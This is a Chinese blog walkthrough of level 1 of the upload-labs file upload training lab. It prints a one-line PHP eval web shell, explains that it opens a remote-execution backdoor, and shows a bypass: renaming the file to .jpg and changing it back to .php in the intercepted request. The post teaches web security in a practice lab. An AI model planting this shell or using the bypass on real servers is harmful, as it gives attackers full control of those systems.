文件上传漏洞:upload-labs靶场通关1到5关保姆级详解

                                                         文件上传漏洞:upload-labs靶场通关9到15关保姆级详解-CSDN博客

                                                                     第一关

第一种方法

尝试上传一个包含一下内容的php文件:


<?php
@eval($_POST['a']);
?>

  1. ​<?php​:这是PHP的开始标签,表示以下内容是PHP代码。

    ​@eval($_POST['a']);​:

    • ​eval()​:这是一个PHP函数,用于将字符串作为PHP代码执行。它会将传入的字符串当作PHP代码来解析和执行。
    • ​$_POST['a']​:这是从HTTP POST请求中获取名为 a​ 的参数的值。攻击者可以通过发送一个POST请求,将恶意代码作为 a​ 参数的值传递给这个脚本​
    • 为了方便理解
    • ​111.php​ 是一个“命令执行器”,它会执行任何通过 a​ 参数传递给它的命令。攻击者可以通过发送一个特殊的请求,告诉这个“命令执行器”执行他们想要的任何代码。

一句话木马如果能够正常运行,确实会在服务器上产生一个后门。这种后门允许攻击者远程执行任意代码,从而完全控制服务器

将该php文件改成 jpg文件

可以正常传入

使用抓包工具

将filename111.jpg 改成 111.php

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值